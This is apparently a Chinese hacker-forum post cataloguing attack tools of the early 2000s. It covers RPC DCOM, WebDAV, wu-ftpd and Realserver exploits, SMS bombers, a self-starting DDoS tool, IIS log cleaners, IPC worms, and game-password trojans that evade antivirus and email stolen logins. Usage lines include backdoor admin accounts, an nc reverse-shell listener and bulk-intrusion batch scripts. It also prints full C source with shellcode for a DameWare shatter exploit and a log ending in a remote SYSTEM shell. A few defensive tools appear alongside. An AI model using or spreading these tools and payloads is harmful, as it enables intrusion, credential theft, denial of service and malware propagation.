efsview.zip加密文件系统&(EFS) 提供一种核心文件加密技术.访问加密文件时,对于该文件加密用户此加密不可见.对于非法访问者将会出现权限错误提示.这个程序可以列举某个文件的密钥所有者和恢复者.
KerbCrack 1.2kerbcrackv压缩包里内含两个程序，其中kerbsniff.exe用来抓取Win2000/XP网络中的Kerberos登陆信息到一文件，然后使用kerbcrack进行暴力或者字典破解被捕获的信息，在Celeron 533计算机上破解时，每100万次密码尝试时间不会超过10分钟。Kerberos V5 身份验证机制是在Win2000域中进行身份验证的主要安全协议，校验了用户的身份和网络服务。
KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network
and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from
the capture file using a brute force attack or a dictionary attack. More information can be found
in the KerbCrack FAQ(http://ntsecurity.nu/toolbox/kerbcrack/faq.shtml).
AnyPassword V2.0本程序为多种密码获取的集合，可获取电脑内一般加密后的密码（如：屏幕保护、BIOS、共享、 Access、查看*号密码、以及一些常用的如优化大师等密码）并提供删除密码功能（还有一些提供了修改密码的功能）。您拥有本程序，可方便快捷的找出你所忘记的密码。本程序不须要任何控件支持，程序短小，方便下载和存放。
万象计费幽灵 V1.1版是用来破解万象计费的一个软件…该版本修改循环打开主页的缺陷，还可以查杀万象所有版本。
美萍计费幽灵 V1.0版美萍计费幽灵 V1.0版.使用方法，先需要用自己的会员帐号登陆，然后运行此软件.点击杀，然后马上退出你的会员帐号，30秒之后可以见到桌面!
今晚找到几个最近流行起来的系统漏洞的补丁.现在放上…是windows2003系统的…
Windows Media Player URL脚本命令运行缺陷文件名：WindowsMedia-KB-CHS.exe
下载大小：2841 KB
发布日期：
版本：828026
概述已发现一个安全问题能够导致攻击者在运行Windows Media Player的计算机上执行命令。
下载地址：
MS03-044 windows帮助和支持中心的缓冲区溢出文件名：WindowsServer2003-KB-CHS.exe
下载大小：328 KB
发布日期：
版本：825119
概述一个关联HCP协议的文件能导致windows中的帮助和支持中心发生缓冲区溢出，并以当前用户的权限执行代码。
下载地址：
MS03-043 Messenger服务的缓冲区溢出漏洞文件名：WindowsServer2003-KB-CHS.exe
下载大小：396 KB
发布日期：
版本：828035
概述由于Messenger服务不能适当处理消息的长度，导致缓冲区溢出。攻击者如果成功利用该漏洞，可以使代码在Local System权限下运行。
地址：攻击工具这次有几个手机的攻击…screen.width-366)this.width=screen.width-366& border=0& 不知道是不是真的有用.
紫色幻影o2o.bat最新升级版本，正式改名为&紫色幻影&，利用批量处理对目标进行攻击。远程打开对方端口（适用于所有windows版本），创建超级用户名，共享C,D盘。限制IE浏览，禁止修改注册表。运行前强行关闭病毒防火墙。（最新版本不被病毒防火墙查出）软件本体将通过Outlook以附件形式向外传播。远程修改注册表，制造垃圾文件，攻击目标主机。使用方法：解压缩后，双击运行即可。超级用户名：oo 密码：163建议使用3389端口进行入侵。感谢小凤居对本人的鼓励及帮助！最新版本已经删除了对电脑有破坏作用的代码。声明：此软件造成的一切法律后果本人均不负责。（此项声明对前三个版本同样有效）
MessengerOverflow(MS03-043).c利用MS03-043漏洞而攻击的exploitDoS Proof of Concept for MS03-043 – exploitation shouldn’t be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4.&The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer& according to MS bulletin. Digging into it a bit more, we find that when a character 0×14 in encountered in the ‘body’ part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, butCredits go to LSD screen.width-366)this.width=screen.width-366& border=0&
iSMS.vbsiSMS.vbs手机炸弹使用方法:
CScript iSMS.vbs 手机号码 您的姓名 您的性别 发送次数 发送内容 [累加因子]注意: 性别中1表示先生,2表示女士,如果您的姓名或发送内容中有空格或为空时,请使用引号将该参数引住。由于该网站不允许提交重复数据,所以在循环中参加了累加因子,该参数是数值型可选项。CScript iSMS.vbs -h 查阅用法实例。例如:CScript iSMS.vbs
Lilo 1 100 hello 120累加因子，会加到 内容和姓名上面随短信发出去，对方接到后会是Lilo:121 什么什么的这样的名字。
SQL injection with 盗帅下载系统正式版2.0盗帅下载系统的最新版本中虽然解决了大多数上一个版本中存在的漏洞，仍然存在SQL injection漏洞可以导致管理员密码的泄露，以前的for盗帅下载系统的程序已经对2.0正式版无效，此程序针对这个新漏洞而写（review.asp文件），可以得到MD5加密后的管理员密码（32位），自己再找程序破解。
yhWebDav.rar一个webdav软件！发布者对这个软件进行了修改、汉化、重新编译！
SmsFlood Ver 1.0基于命令行的手机短信攻击软件，格式是smsflood &手机号码& &发送次数&&回车&。
RPC2 by sbaa(for ms03-039)RPC DCOM2 heap overflow Vulnerability discoveriedfor:Windows 2000 Sp3,SP4+ms-026(cn)Windows 2000 SP4 +ms-026(en)成功后添加管理员帐号IUSA，密码为k911
RPC2v1.1(for ms03-039)MS03-039 RPC DCOM long filename heap buffer overflow exp v1for cn w2k server sp3/sp4+ms03-26成功后添加管理员帐号SST，密码为557
MS03-039RPCDCOM-en.rarMS03-039溢出程序这个exp非常不通用。只能溢出英文版的，一般先pskill rpcss，然后再运行这个exp，如果版本参数没错的话，基本上可以成功。成功的话，会添加一个账号。（未测试）
Simple Bind 1.0一个EXE文件合并器，使用非常简单，合并完后它还会提示你是否要修改图标。
newrpc.zip三个RPC最新溢出代码，测试用，请谨用。
DDoS攻击者 1.4本软件是一个DDoS攻击工具，程序运行后自动驻入系统，并在以后随系统启动，在上网时自动对事先设定好的目标进行攻击。可以自由设置&并发连接线程数&、&最大TCP连接数&等参数。由于采用了与其它同类软件不同的攻击方法，效果更好。
注：本软件只可用于DDoS攻击测试，请勿将其用于非法用途。
CuteIISLogClean 1.1一个清除IIS日志的工具，可以根据自定义的字符串来删除日志中包含该字符串的行有手动和自动两种模式，自动模式直接根据自定义的字符串自动清理当天的日志手动模式可以指定一个日志文件进行清理
THCREALbad v0.4可以溢出linux和WINDOWS下的Realserver 7,8,9版本F:\&THCrealbadc
THCREALbad v0.4 – Wind0wZ & Linux remote root sploit for Realservers 8+9by Johnny Cyberpunk ()
Usage:0 = Wind0wZ1 = Linux2 = OS Test Mode
0×82-wu262-advanced.rarWu-ftpd v2.6.2溢出程序加强版，把FBSD，OBSD WU26*加进去了，并加了个扫描的功能。
fm-shatterdame.rarDameWare Mini-RC溢出程序使用方法首先打开DameWare Mini Remote Control Server然后运行本程序！注意：不是DameWare NT Utilities
DameWare Mini-RC 破坏攻击
涉及程序：DameWare Mini-RC
描述：DameWare Mini-RC 破坏攻击
详细：DameWare为管理员设计的能简单操作的远程控制软件，提供快速帮助，无须外界帮助和机器重启就可简易配置。DameWare Mini远程控制端以SYSTEM级运行在用户桌面。在DameWare中发现存在破坏性攻击。
受影响系统：DameWare Mini远程控制服务端3.71.0.0之前的版本
攻击方法：示例代码：/*Shatter attack exploit for DameWare Mini Remote Control Serverby
see associated advisory
This code is based on shards.cpp by xenophile
#define WIN32_LEAN_AND_MEAN＃i nclude＃i nclude#pragma warning(disable: 4305)#pragma warning(disable: 4309)void MakeShellCode (char *buffer){HMODULE hCRT;void * lpSint count=0;
while (count & 36){buffer [count] =0×90;count ++;}
buffer[37]=0×8B; buffer[38]=0xE5; buffer[39]=0×55;buffer[40]=0×8B; buffer[41]=0xEC; buffer[42]=0×33;buffer[43]=0xFF; buffer[44]=0×90; buffer[45]=0×57;buffer[46]=0×83; buffer[47]=0xEC; buffer[48]=0×04;buffer[49]=0xC6; buffer[50]=0×45; buffer[51]=0xF8;buffer[52]=0×63; buffer[53]=0xC6; buffer [54]=0×45;buffer[55]=0xF9; buffer[56]=0×6D; buffer [57]=0xC6;buffer[58]=0×45; buffer[59]=0xFA; buffer[60]=0×64;buffer[61]=0xC6; buffer[62]=0×45; buffer[63]=0xFB;buffer[64]=0×2E; buffer[65]=0xC6; buffer[66]=0×45;buffer[67]=0xFC; buffer[68]=0×65; buffer[69]=0xC6;buffer[70]=0×45; buffer[71]=0xFD; buffer [72]=0×78;buffer[73]=0xC6; buffer[74]=0×45; buffer [75] =0xFE;buffer[76]=0×65;
hCRT = LoadLibrary(&msvcrt.dll&);lpSystem = GetProcAddress( hCRT, &system& );buffer[77]=0xB8;buffer[78]=((char *)&lpSystem) [0];buffer[79]=((char *)&lpSystem) [1];buffer[80]=((char *)&lpSystem) [2];buffer[81]=((char *)&lpSystem) [3];buffer [82] =0×50; buffer[83]=0×8D; buffer[84]=0×45;buffer[85]=0xF8; buffer[86]=0×50; buffer[87]=0xFF;buffer [88]=0×55; buffer[89]=0xF4;count = 90;while (count & 291){buffer [count] =0×90;count ++;}buffer[291]=0×24; buffer[292]=0xF1; buffer [293]=0×5D;buffer[294]=0×01; buffer[295]=0×26; buffer[296]=0xF1;buffer [297] =0×5D; buffer[298]=0×01; buffer[299]=0×00;buffer[300]=0×00;}void ErrorNotify(DWORD err, char *title){LPVOID lpMsgBFormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,err,MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language(LPTSTR) &lpMsgBuf,0,NULL) ;
printf(&%s\n&,lpMsgBuf);
LocalFree( lpMsgBuf );};#define SHELLCODE_SIZE (1024 * 256)#define SHELLCODE_OFFSET (SHELLCODE_SIZE -400)int main(int argc, char* argv[]){HWND hWHWND hWndCchar sc[SHELLCODE_SIZE];char szWindowName[] = &About DameWare Mini Remote Control Server&;LONG lExecAsc[0] = sc[1] = sc[2] = sc[3] = 0;memset( &sc[4], 0×90, SHELLCODE_SIZE -4);MakeShellCode( &sc[SHELLCODE_OFFSET] );printf( &\nfm-shatterdame.c\nash(AT)felinemenace.org\n& );printf(&————————————————————–\n&);printf(&Exploits shatter attack in DameWare Mini Remote Control Server\n&);printf(&This is based on shards.cpp written by xenophile.\n&) ;printf(&————————————————————–\n&);printf(&STEP 1: Finding our window!\n&) ;
hWnd = FindWindow( NULL, szWindowName );if( hWnd == NULL){
printf(&Couldnt find the dameware about dialogue. Open it and re-run this\n&);return 0;}
hWndChild = FindWindowEx(hWnd, NULL, &Edit&, NULL);
if( hWndChild == NULL){
printf(&\tCouldnt find child edit control window\n&);
return 0;}
SendMessage( hWndChild, EM_SETREADONLY, 0, 0 );
SendMessage( hWndChild, EM_SETLIMITTEXT, SHELLCODE_SIZE, 0L );
if ( ! SendMessage( hWndChild, WM_SETTEXT, 0, (LPARAM)sc ) ) {ErrorNotify ( GetLastError (), &error&);}printf(&\n\nSTEP 2: Enter shell code address. &&This can be found using a debugger.&) ;printf( &\nOn my XP SP1 machine 0×160000 worked.\n& );
printf( &\n\nEnter execution address: & );scanf( &%x&, &lExecAddress );
if ( ! SendMessage( hWndChild, EM_SETWORDBREAKPROC, 0L, (LPARAM)lExecAddress ) ) {ErrorNotify( GetLastError(), &error& );}
SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0×000a000a );
return 0;}
解决方案：DameWare Mini 3.71.0.0版修正该缺陷，请用户及时访问下列站点进行升级：
黑客在线感谢您的参与
[小广播]2004年第8期黑客在线10日即将上市，要购买杂志的读者注意啦！　头衔：入侵无痕
荣誉：名人职务：论坛版主级别：风云使者积分：1088经验：5296文章：1036注册：
20:46:22 第7楼
wu262.zipwuftp2.62远程溢出攻击工具wuftpd version 2.6.2 remote root exploit that makes use of the off-by-one vulnerability discussed
here. Win32 version included that requires cygwin1.dll. Homepage:
Xpl017Elz. Ported to Win32 by class101.
RPC Exploit GUI v2RPC Exploit GUI v2，将几款主要的工具集于一身的。当你尝试使用这个新版的RPC Exploit去&hack&别人的2000/XP/2003主机的时候，常用的FTP服务端和端口扫描器就在你的手边。它将目标转换到DOS命令行模式，并允许你使用FTP服务端上传文件，和远程执行程序。
KAHT IIKAHT II – MASSIVE RPC EXPLOITRpc DCOM批量溢出
dcomrpc.rarDcomRpc修改通用版感觉那个有反弹功能的通用版有点不好使，Expl01t修改了这个，测试了，很恐怖。。。。
iis-media.rarWindows Media服务nsiislog.dll远程溢出程序
T-SysCmd v1.0本程序为一款基于IDT的攻击程序，也可以说是Windows系统下的内核级后门程序。它可为任意用户(包括Guest)提供SYSTEM权限级别的Command。适应平台： Intel x86 Family, Windows 2000/XP。
Immunity CANVAS可以在任何平台运行,用python写的一个攻击工具集合,是一个商业程序,售价995美金的东西.
BBSXP-dzk.zip新的BBSXP论坛漏洞利用工具，漏洞利用原理请看压缩包里的说明。
rpc-exploit.rar作者：&因测试环境受限，我只测试了中文版的win2000/xp 的版本，都很成功！其他版本请大家帮忙测试，我想即使这个不成功，也会出现英文版、繁体版等等的通用版本！这主要因为windows 操作系统内存管理分配存在（固定）堆的问题！而以前都停留在动态连接库中查询，才会受补丁影响。在（固定）堆中例如ff e4 、50 c3 、51 c3、 52 c3、 53 c3、 54 c3等等很多，基本上能解决目前返回地址的问题。希望大家在着一方面作更多研究彻底解决sp 的问题。我的程序中dcom rpc 漏洞，返回地址随便挑的54 c3 （push esp/ ret）。我的程序一个是dcom rpc攻击程序，在远程机器添加user/pass:qing10/qing10、另外一个远程启动rpcss服务
恢复被攻击机器的工作环境。&
cndcom.rarRemote DCOM RPC Buffer Overflow ExploitRPC 溢出程序针对以下版本:- Targets:- 0 Windows 2000 SP0 (English)- 1 Windows 2000 SP1 (English)- 2 Windows 2000 SP2 (English)- 3 Windows 2000 SP3 (English)- 4 Windows 2000 SP4 (English)- 5 Windows XP SP0 (English)- 6 Windows XP SP1 (English)- 7 Windows NT SP5 (Chinese)- 8 Windows NT SP6 (Chinese)- 9 Windows NT SP6 (Chinesebig5)- 10 Windows 2000 SP0 (Chinese)- 11 Windows 2000 SP1 (Chinese)- 12 Windows 2000 SP2 (Chinese)- 13 Windows 2000 SP2 add(Chinese)- 14 Windows 2000 SP3 (Chinese)- 15 Windows 2000 SP3 add(Chinese&big5 sp3)- 16 Windows 2000 SP4 (okChinese)- 17 Windows 2000 SP4 add(Chinese)- 18 Windows XP SP1 (Chinese)- 19 Windows 2000 SP0 (Japanese)- 20 Windows 2000 SP1 (Japanese)- 21 Windows 2000 SP2 (Japanese)- 22 Windows 2000 SP0 (Korean)- 23 Windows 2000 SP1 (Korean)- 24 Windows 2000 SP2 (Korean)- 25 Windows 2000 SP0 (MX)- 26 Windows 2000 SP1 (Mx)Usage: cndcom
铁血-Open完全用批处理写的远程开启3389服务的工具。不依赖管理共享了。tx3389.bat [IP] [用户名] [密码]tx3389.bat [肉鸡文件]如果指定肉鸡文件批处理将从文件中读取ip 用户名 密码肉鸡文件的文件格式为ip 用户名 密码。空格隔开。例1：tx.0.2 user &&例2：tx3389 file.txt肉鸡文件格式如下（空格隔开）：192.168.0.1 user &&192.168.0.2 administrator 123192.168.0.24 administrator admin
冰点病毒本文件分为 bingdian.vbs 和 reset.vbs。★bingdian.vbs为病毒文件请谨慎使用！！！★假如不小云运行了病毒文件，请使用 reset.vbs 解毒！本病毒编写语言为 VBSCRIPT 脚本语言，只要是大量修改注册表。病毒产生在WINDOWS目录下明为冰点（bingdian),修改注册表各项参数，以及WINDOWS各种设置，设置开机对话筐为Welcome to bing dian BBS，并且通过电子邮件进行传播，请谨慎使用！
dcom.plDcom.pl 远程溢出攻击脚本该脚本可以影响使用RPC的DCOM接口，此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者成功利用此缺陷可以以本地系统权限执行任意指令。攻击者可以在系统上执行任意操作，如***程序、查看或更改、删除数据或建立系统管理员权限的帐户。用法:dcom.pl 127.0.0.1
sqldos.rarexp for Microsoft SQL Server DoS(MS03-031)微软sqlserver拒绝服务漏洞攻击程序
s-demo.rars-demo的通用密码察看器可以查看出动画的原始加的密码是什么要求是动画文件的名字是moon.exe瑞星会提示病毒，其实是误报
wdx.rar使用方法: wdx.exe 目标IP
代码的原型是isno的webdav3.pl本次修改范围1、将lock替换成了PROPFIND这样会减少目标主机iis崩溃的可能
2、修改了溢出代码，对于默认设置sp3版本的主机基本上可以做到一次成功
3、将反馈信息都改为中文的了！谁叫我们都是中国人。
4、就修改了以上这么多作者：雪莲莲本人经过测试，命令格式应该是WDX IP offset typeoffset有0-20和-1&#TYPE有GB和BIG5两种语言比如：wdx 127.0.0.1 0 1我已经溢出过了，一次成功，速度也快
LB论坛search.cgi漏洞利用程序LB论坛search.cgi漏洞利用程序，已经编译好。请不要恶意攻击，后果自负。。。使用方法见说明。
re.zip天行的Microsoft Rpc Locator Service的攻击程序,可以使远程攻击者获取system权限.
e:\tools.dos&re -h 10.24.9.100Microsoft Rpc Locator Service ExploitWeb :
Email : Thanks: yuange.
[!] Connecting to 10.24.9.100# OS Type: Windows 2000 SP0-SP3[$] Connected 10.24.9.100![+] Exploiting 10.24.9.100![&] Sending shellcode!# Trying to reuse connect to 10.24.9.100:138 …[!] Connected! Here comes the shell baby…
Microsoft Windows 2000 [Version 5.00.2195](C) 版权所有
Microsoft Corp.
C:\WINNT\system32&
IEobjectEXP.rarMicrosoft Internet Explorer对象类型属性缓冲区溢出漏洞测试程序漏洞描述详见
动网logout.asp利用程序动网logout.asp利用程序（已编译）相关文章：
开3389终端的批处理程序红衣刺客编写的一个给远程主机开3389终端的批处理程序压缩包里面的文件：open3389.bat 开3389终端的批处理程序3389.bat 辅助批处理psexec.exe NT的远程执行工具
使用方法：open3389.bat 肉鸡的IP 肉鸡的ADMIN组的用户 用户的密码open3389.bat IP USER PASS
winmercrexp.rarMERCUR Mailserver 4.2.0.0 remote ‘SYSTEM’ level exploit该程序利用的是2000／XP系统提供的一个MAIL　SERVER中所存在的一个远程溢出，而***这个MAIL　SERVER通常会开放一个端口 32000，所以扫描目标可以扫描32000端口，当然找到这个端口，必须得确认为2000／XP，而不是UNIX／LINUX。使用格式如下：先在本机上使用NC开一个***：nc -l -p 3333
然后进行远程溢出：winmercrexp 目标IP　32000　自己IP　3333
如果NC可以得到对方的CMD　SHELL就成功了。
Maelstromexp.cmaelstorm这个游戏在很多linux下面都***了，3.06版本以前很多是setuid的。有人发现有缓冲区溢出漏洞，网上存在的几个作者在他的redhat 9.0下都不能成功溢出，上次翻译了netric的溢出文章以后试着写的一个。一次成功，不需要猜测ret.
mailexp.clinux的几个最新版本的mail都有缓冲区溢出问题，但是都没有SUID，just play for fun
x_diagrpt_aix5l_4x.shExploit local diagrpt command of Aix5.x & 4.x to get a root shell.Tested on Aix5.1 , Aix4.3.3.
如果不成功则通常是你的系统已经打了相应补丁。
daoshui.zip盗帅下载系统攻击脚本是lcx根据wawa的改的。盗帅下载作者只测试过1.0，可能2.0同样适用。
SMBRelay2 v.98SMBRelay2 v.98 – NetBIOS level SMB man-in-the-middle relay attackNetBIOS level SMB中间人攻击工具。详细使用请看说明。
sars_final.tar.gz由adore改写而来（后门程序都是adore的），通过samba的远程溢出进行传播，里面附带c源码和清除脚本(clean.sh)。好早就写出来的东西，现在有这个漏洞的机器不是很多了，请使用者在内网测试。放出来的目的是给大家一个写worm的模板。注意:破坏不是目的,请尊重他人的劳动果实(数据),为自己的行为负责
IPC Auto Hacker Ver 1.7这个是个自动收集肉鸡的批处理,现在你所拿到是最新版的1.7(5月25日发布)，当然，也有自动入侵的部分，而且速度是网上现在能找到的IPC批量入侵的N倍只是Blackfox有点懒，以后的几个版都是同个朋友帮他发布的，这一版的有这我们剑鹰技术联盟来发布
升级说明：增加了IPC补丁文件补丁文件里加上打开远程终端的功能(端口为:2236)修正了肉机补丁的Bug修正了1.6补丁升级版中的COPYIPC补丁出错问题去除了开启TELNET服务的功能(Blackfox感觉有WinEggDropShell就够了)增加了字典的的常用单词，去除了一些不常用的修正了说明文档
Pi3web-DoSDoS工具，内含源代码。
linux_atm.cLinux 下atm的本地溢出程序（问题出在les）redhat7.3测试通过
ms03-013_exp_for_win2k.rar
Microsoft Windows内核消息处理本地缓冲区存在溢出漏洞详细请看http://www.chinesehack.org/file/bug/show.asp?id=7440
Webdav MICROSOFT IIS DoSserwebdav DoS工具Microsoft IIS WebD***存在超长请求远程拒绝服务攻击漏洞，具体请看
运行xDebug.exe，成功后会以SYSTEM权限运行ey4s.bat
wmi.zipwindows2000中提升权限的东西,运行以后会内建一个XX用户名的管理员权限的用户相关文章http://www.xfocus.net/articles/.html
WINNTAutoAttack 2.6+简单使用教程
Windows NT/2000 自动攻击探测机该版本已经开放部分自动攻击探测功能,本程序仅供研究测试用,用于其他或者非法途径后果自负。
DVtxt.rar动网文章是一款由WWW.ASPSKY.NET开发和维护的源代码开放的文章管理系统，在国内使用非常广泛；由于其
list.asp等模块没有过滤用户提交传递给SQL查询的输入，导致远程攻击者可以利用这个缺陷进行SQL注入攻击
。注意: 请不要恶意破坏他人系统! 此程序仅仅为测试安全所用,请不要用于其他非法途径! 如果你不同意,请立
即删除! 我们不对此程序带来的任何后果负责,亦不提供任何技术支持!
批处理编写的IPC蠕虫IPC Worm的功能：
1、杀死本地杀毒程序的进程。2、在本地添加一个用户名。3. 把自身复制到启动项。4. 共享C D E F 盘4、随即生成一个IP地址。5、扫描弱口令。7、复制自身到目标主机，并执行。
破解网吧破解网吧部分设置的软件！附带一个网页在线打开模版，以供本程序在网页中直接运行！感谢作者提供。
嗅探***这次找到了些游戏的东东.大家看看吧.其他的都相当于监控软件了.
密码王朝之奇迹影子本程序可准确截取准确截取奇迹游戏的登陆区，服务器，用户名，密码 ，仓库密码，全面支持游戏最新版，躲避个各大杀毒软件&&
传奇密码终结者说明：1、能截取传奇区域、用户名、密码、服务器、人物名称、职业、等级及修改密码、注册新用户里的所有信息。2、能自动判断用户名及密码的准确性，只记录正确的ID和密码。3、主程序体积只有23KB，这更加有利用于程序的合并及制作网页木马.4、能自行关闭多种杀毒软件及防火墙。【如：金山毒霸2003、金山网镖2003、瑞星杀毒2003、天网防火墙、木马克星、绿鹰PC万能精灵、噬菌体密码防盗专家、网吧密码防盗专家、Lockdown、ZoneAlarm &&】
光媒奇迹木马(gmmuspy)特点：捕获奇迹游戏的登陆帐号，密码，具体服务器，仓库密码，IP地址，时间等信息。双重捕获，一触即发。其中仓库密码为全程记录，无论设立，修改，进入仓库，其密码都能顺利记录，并发送到指定的邮箱。独特的分模块技术使功能无限扩展，是游戏木马中的典范之作。
密码王朝破天影子本程序可准确截取准确截取破天一剑游戏的登陆区，服务器，用户名，密码 ，全面支持游戏最新版，躲避个各大杀毒软件&&
光媒网络传奇世界木马捕获传奇世界的登陆区号，帐号，密码，服务器，IP地址，发送邮件时间等信息，并且发信件到指定邮箱。采用特殊的记录方式，无论密码是由键盘输入还是软键盘输入，都能顺利，完全的记录。采用分模块技术，程序健壮，功能无限扩展。是网络上第一家公开发布的传奇世界木马。鉴于传奇世界的某种特殊性，使在开发此木马上增加了一定的难度。光媒网络的首家推出，充分证明了光媒网络雄厚的技术力量。
Anti-Sniffer 1.0一个检测系统所有网卡是否处于混杂模式的小程序(处式的话是有嗅探器在进行嗅探).只检测本地系统(运行了这程序的系统)，只用于win 2k/xp/2003
密码天使之光通来客本程序可准确截取光通游戏登陆的ID,密码，服务器等，全面支持传奇最新版。
程序随计算自动启动，可躲避各大杀毒软件。
测试版只显示部分密码，不自动运行；正式版可远程截取，随计算机自动运行.软件显示详细级别，区号，服务器　软件采用线程技术，防查杀；软件最大的特点在于采用了网页木马，远程盗取，我们利有IE5.0/6.0的漏洞软件会自行下载***并支持，采用80端口发信，正常保证用户的使用，我们还提供菜来姆对软件进行感染，以保证用户***的木马随时正常运行。我们采用最新的句柄性技术盗取，保证木马的准确无误，在业内是第一个采用此核心技术的软件。
天舟慧眼 v1.4天舟慧眼 v1.4 注册版，是一款以日志形式记录PC行为的国产系统监视软件。它会自动将你的电脑每天的动作、行为以系统的开关机时间（对应多次起动）、用户名、每个被打开窗口的标题、开始时间、结束时间、活动时间、击键数量等形式记录下来，用户可以用专用的日志管理程序查看每天的记录，并可在各种模式下对历史记录进行搜索、排序和统计分析。天舟慧眼还具有自动将每天的历史纪录以Email发送到其他PC上进行远程监视等功能。若设定统计关键字，还可以对每个特定应用程序每天使用的情况进行自动统计分析。对于上网记录,还可以通过日志管理程序直接登陆历史网站。天舟慧眼具有隐蔽或显示两种工作模式。
联众GOP1.0 本地版录联众密码的东东.运行一次后,随计算机自动启动.解压后把联众GOP,放到别人看不到的目录里运行.运行后什么反应都没有.应为本程序是在后台运行. 　记录的联众密码在系统目录里的gl.txt文件里,打开方式选为记事本就可以.
猎游者之传奇2记录并发送传奇2用户信息的软件本程序可以捕捉奇迹登陆帐号，密码，服务器 ，仓库密码等信息。发信时防火墙无法阻拦。正式版经过特殊处理，杀毒软件不能对其查杀。作者提供。
猎游者之传奇3记录并发送用户信息的软件本程序可以捕捉传奇3登陆帐号，密码，服务器 人物名称，级别等信息。发信时防火墙无法阻拦。正式版经过特殊处理，杀毒软件不能对其查杀。作者提供。
牛族nt/2000/xp 密码大盗V1.1主要利用NT系统GINA(Graphical Identification and Authentication，图形化的身份认证) 进行密码窃取的程序，劫获的密码被保存在system目录下的 GinaPwd.txt 里，捕捉到的密码文件格式如下(我的机器 WIN XP下测试结果,呵呵，这个密码当然是REMARK的咯。。。^_^ )
日期：[07/22/00] 时间：[03:27:33]=====================================用户名：maomao密码：windows2000登陆域：TZOL
Fearless Key Spy v1.1b这是一款间谍软件，能将对方使用电脑的logs上传到指定FTP服务器。
Iris Network Traffic Analyzer v4.06.4Iris Network Traffic Analyzer v4.06.4 零售版，eeye公司出品的网络流量分析监测工具，可以帮助系统管理员轻易地捕获和察看用户的使用情况，可以同时测到进入和发出的信息流
sniffer pro 4.70.530sniffer pro 4.70.530汉化注册版sniffer pro，NAI公司出品的可能是目前最好的网络协议分析软件之一了，支持各种平台，性能优越，做为一名合格的网络管理员肯定需要有这么一套好的网络协议分析软件了，只是有点大请用下载工具下载。
密码***器 v2.2密码***器 2.2注册版密码***器用于***基于WEB的邮箱密码。只需在一台电脑上运行，就可以***局域网内任意一台电脑登录的用户名和密码，并将密码显示、保存，或发送到用户指定的邮箱。
KFSensor Version 1.3.0KFSensor Version 1.3.0KFSENSOR的优点：
1）准确性比较强，防火墙与其他的IDS常常会被一些&合法&了的网络通信所&迷惑&，从而被RULE所&曲解&,而KFSENSOR是不会分辨所有的连接中谁是合法，谁是不合法的。
2）低成本，KFSENSOR会在被攻击时以假睡眠方式来&欺骗&攻击者，并且只使用了极少的处理时间与网络资源。 它***在用户的计算机时是不会影响其他程序的正常进行的，并且不需要其他附加的硬件。
3）使用简便。当你使用了KFSENSOR时就会很快得发现到这一点了。它的配置与操作到是以直线的&方向&进行的， 这只需要你看看说明，修改一下就可以正常使用了。
4）实时探测功能。只要在运行此程序，报告攻击与分析结果都会在很短的时间里完成。
5）探测未知的数据攻击，KFSENSOR不像其他的产品，它是不会依靠已知的攻击类型数据去探测的，它可以动态得探测其他新型的攻击。
6）安全的&渗透性&。KFSENSOR可以补足其他安全产品的不足，并提供附加层次的安全性。
7）只要一个管理员就通过配置监视与管理整个组织的HONEYPOT监视器了。
Ethereal 0.9.12这是一款免费的网络协议分析程序，支持Unix、Linux、Windows，它可以直接从网络上抓取数据进行分析，也可以对由其他嗅探器抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包，查看每一个数据包的摘要和详细信息。 Ethereal有多种强大的特征，如支持几乎所有的协议、丰富的过滤语言、易于查看TCP会话经重构后的数据流等。这里提供的是WINDOWS平台下的版本，若需要其它系统的版本请自行访问作者主页下载。
网页密码记录机0.1A测试版可以记录网页中的各种用户名和密码，因此不单是可以对邮箱有效，对其它需要验证的例如论坛等都有效。（针对IE）
ComLog 1.01这个工具可以在后台***所有调用cmd.exe的动作,记录到\winnt\help下的一个指定目录,这对监控服务器安全运行状况非常有帮助. 使用前把Winnt\System32\目录下的cmd.exe改名cm_.exe，把comlog101拷贝到Winnt\System32\下，然后转到Winnt\Help\创建一个新的目录用来保管ComLog历史文件就可以了。内含perl源程序。
Hiddukel VI proHiddukel 系列的 VI -NinJo- 加强版，汲取保留了前几个版本的所有功能和优点，减少了生成的客户端的体积，增加了直接截取内存数据的全新功能，并提供了发送邮件时是否进行进程插入的选择。
盗密高手1.0监视被监视端(装了此程序的电脑)上QQ、邮箱等各种密码，并发送到您设置的邮箱。
第一次运行本程序时进入设置对话框进行设置，发送、接收信箱经过加密处理，请务必填准确否则可能无法接收到邮件。选取&下次启动时隐藏&在下次启动时就不会出现启动界面。确定后，您可以测试您设置的发送、接收信箱是否可用，测试成功将会收到一份确认信，一切完毕后退出重新运行该程序即可！
Family Key Logger V2.50 注册版Family Key Logger V2.50 注册版，你可以用来监视你不在的时候，你家人或单位同事使用了你的电脑干了些什么，它是你最好的选择。你可以在选项里边设置，开始就隐蔽运行或者隐瞒在任务列表…
proDETECT 0.1 BETAproDETECT 0.1 BETA，它使用ARP小包裹分析技术检测适配器在混杂模式，管理人员可以用它来扫描局域网内的嗅探器（比如他人非法使用了局域网终结者），能进行周期性规则扫描，包括高级的报告能力比如SMTP…需WinPcap支持工作，可以在http://www.chinesehack.org/down/show.asp?id=2778下载。内含源文件
EasyPassToFile Version -1+ Beta运行本软件，将在同一目录下生成 EasyPass.txt 文件，该文件内有取得的密码和信息。运行后可以取得本机上的 Outlook Express 的邮箱信息，邮箱密码。IE 5 的自动完成保存的密码。使用 IE FTP 保存的登陆密码等。
EasyPassToFile Version -1+ Beta !解决：远程使用时，由于不是当前用户，不能访问 HKEY_CURRENT_USER 而不能获得信息的问题。
具体请说明。
感谢作者提供。
Blackart v0.93在Data Link层实现对网卡封包的捕获，并解析Ethernet和IP, TCP, UDP, ICMP header本软件需要WinPcap 3.0，可在本站下载
黑客在线感谢您的参与
